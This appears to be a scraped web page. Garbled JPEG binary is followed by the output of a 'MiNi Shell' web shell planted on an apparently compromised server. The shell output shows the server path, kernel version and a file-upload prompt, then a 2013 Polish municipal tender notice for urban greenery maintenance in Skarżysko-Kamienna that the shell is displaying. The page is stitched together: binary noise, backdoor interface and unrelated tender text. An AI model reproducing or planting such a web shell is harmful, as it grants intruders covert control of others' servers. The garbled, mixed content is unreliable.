JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130328/47039-N-2013.html

<p class="kh_header"><b>Skarżysko-Kamienna: Utrzymanie zieleni na terenie miasta Skarżysko-Kamienna</b><br>
<b>Numer ogłoszenia: 47039 - 2013; data zamieszczenia: 28.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni na terenie miasta Skarżysko-Kamienna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5-1; 5-2; 5-3; 5-4 , 5-5, 5-6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ.
Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                 zał.3-2 i 5-6, natomiast dla Strefy I - V  zał. Nr 3, 4 i odpowiednio 5-1 do 5-5.Rozliczenie prowadzone będzie w PLN.
Zakres robót oraz częstotliwość ich realizacji dostosowana będzie do posiadanych środków finansowych i warunków wegetacji roślin. 
Przedmiot zamówienia został podzielony na  sześć zadań tj.
Zadanie Nr 1 Utrzymanie zieleni miejskiej w roku 2013 - Strefa I 
Zadanie Nr 2 Utrzymanie zieleni miejskiej w roku 2013 - Strefa II                              Zadanie Nr 3 Utrzymanie zieleni miejskiej w roku 2013 - Strefa III 
Zadanie Nr 4 Utrzymanie zieleni miejskiej w roku 2013 - Strefa IV
Zadanie Nr 5 Utrzymanie zieleni miejskiej w roku 2013 - Strefa V
Zadanie Nr 6 Utrzymanie zieleni miejskiej w roku 2013 - Strefa VI.
Zamawiający dopuszcza złożenie ofert przez jednego Wykonawcę maksymalnie na dwa zadania.
Wykonawca ponosi skutki prawne za ewentualne szkody osób trzecich spowodowane wykonywaniem przedmiotu zamówienia.
Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
ustawy z dnia 14.12.2012  r. o odpadach ( Dz.U. z 2013 r. poz. 21 ze zm. )
ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach          (Dz.U. z 2012 r. , poz. 391 ze zm. )
ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz.U. z  2008 r. Nr 25,     poz. 150 ze zm. ),uchwały Rady Miasta Nr XXXI/102/2012 z dnia 29 listopada 2012 r.w sprawie uchwalenia Regulaminu utrzymania czystości i porządku na terenie Gminy  Skarżysko - Kamienna..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia z art. 22 ust. 1 wg. Wzoru stanowiącego zał. Nr  10 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże , że:
Dla Zadania Nr 1
wykonał usługi , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie tj. co najmniej jednej usługi polegającej na utrzymaniu parków miejskich lub obejmującej w swym zakresie utrzymanie parku o wartości co najmniej 20.000,00 zł. brutto co najmniej trzy usługi polegające na utrzymaniu zieleni miejskiej  w okresie wegetacyjnym roślin oraz pielęgnacji nasadzeń roślin ozdobnych o wartości minimum   co najmniej 100.000,00 zł. brutto każda. Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu prac zgodnie ze wzorem - załącznik nr 6 (właściwy dla danego zadania ) oraz dowodu dot. czy usługi zostały wykonane lub są wykonywane należycie. dla Zadania   Nr 2, 3, 4 i 5 wykonał usługi , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie tj. co najmniej trzy usługi polegające na utrzymaniu zieleni miejskiej w okresie wegetacyjnym roślin o wartości minimum 35.000,00 zł. brutto każda. Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu prac zgodnie ze wzorem - załącznik nr 6 (właściwy dla danego zadania ) oraz dowodu dot. czy usługi zostały wykonane lub są wykonywane należycie. dla Zadania   Nr 6 wykonał usługi , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie tj. 
co najmniej dwie usługi polegające na utrzymaniu i pielęgnacji rabat lub gazonów kwiatowych  o wartości minimum 85.000,00 zł. brutto każda.
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu prac zgodnie że wzorem - załącznik nr 6 (właściwy dla danego zadania ) oraz dowodu dot. czy usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potencjał techniczny: dla Zadania Nr 1,2,3, 4, 5 i 6
Zamawiający nie wyznacza szczegółowego warunku  w tym zakresie. Warunek ten zostanie spełniony jeżeli Wykonawca  złoży oświadczenie, że dysponuje potencjałem technicznym  do wykonania zamówienia .
Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku zgodnie ze wzorem - załącznik nr 10.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby  zdolne do wykonania zamówienia dla Zadania   Nr  1 i 6
dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj. wskażą
co najmniej jedną osobę, która  będzie  uczestniczyć w wykonywaniu zamówienia, odpowiedzialną za świadczone usługi  legitymującą się kierunkowym przygotowaniem zawodowym ogrodniczym co najmniej na poziomie średnim oraz posiadającą minimum 36 miesięczne (3 letnie ) doświadczenie - zatrudnienie - przy utrzymaniu zieleni.  
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób zgodnie ze wzorem - załącznik nr 7 (właściwy dla danego zadania )
dla Zadania   Nr  2,3,4 i 5
dysponują lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj.: wskażą                   co najmniej dwie osoby, które  będą  uczestniczyć w wykonywaniu zamówienia 
co najmniej jedna legitymująca się kierunkowym przygotowaniem zawodowym ogrodniczym,   co najmniej na poziomie średnim , 
co najmniej jedna osoba, która posiada uprawnienia do pracy pilarką.
 Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób zgodnie ze wzorem - załącznik nr 7 (właściwy dla danego zadania )</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dla Zadań Nr 1,2,3,4,5 i 6
Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia  o spełnieniu warunku zgodnie ze wzorem - załącznik nr 10.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy  - wg wzoru określonego w Załączniku nr 2 do siwz  wraz formularzem cenowym  - zał. Nr  4  do SIWZ właściwy dla danego zadania. Wymagana forma dokumentu - oryginał
Inne dokumenty niezbędne do przeprowadzenia postępowania:pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych, tych podmiotów.
 Wymagana forma dokumentu - oryginał   
pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza
pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza
Zgodnie z paragrafem 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013.231 z dnia 19 lutego 2013 r.) -                                        W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w paragrafie 1 ust. 2 pkt 1 rozporządzenia, noże przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w paragrafie 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady  Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 226, poz. 1817).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
II piętro pok. nr 94.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 12:00, miejsce: Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
parter pok. nr 13 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 Utrzymanie zieleni miejskiej w roku 2013 - Strefa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 Utrzymanie zieleni miejskiej w roku 2013 - Strefa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 Utrzymanie zieleni miejskiej w roku 2013 - Strefa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 Utrzymanie zieleni miejskiej w roku 2013 - Strefa IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 Utrzymanie zieleni miejskiej w roku 2013 - Strefa V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : prowadzenie utrzymania i pielęgnacji  zieleni miejskiej w sześciu strefach, których zakres, lokalizację i powierzchnie ( m2 ) przeznaczone do letniego utrzymania określa wykaz terenów zieleni miejskiej dla każdej ze stref  ( zał. Nr 5/1; 5/2; 5/3; 5/4 , 5/5, 5/6  do SIWZ ) . Szczegółowy opis prac do wykonania w ramach przedmiotu zamówienia, jak również wykaz zakładanej częstotliwości ich wykonania zawarte są odpowiednio w zał. Nr 3 i zał. nr 4 do SIWZ. Warunki realizacji zamówienia określone zostały w projekcie umowy stanowiącym zał. Nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 Utrzymanie zieleni miejskiej w roku 2013 - Strefa VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis robót objętych ryczałtowym bieżącym utrzymaniem  Strefy VI opisuje                             zał.3-2 i 5/6.Rozliczenie prowadzone będzie w PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.31.30.00-7, 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com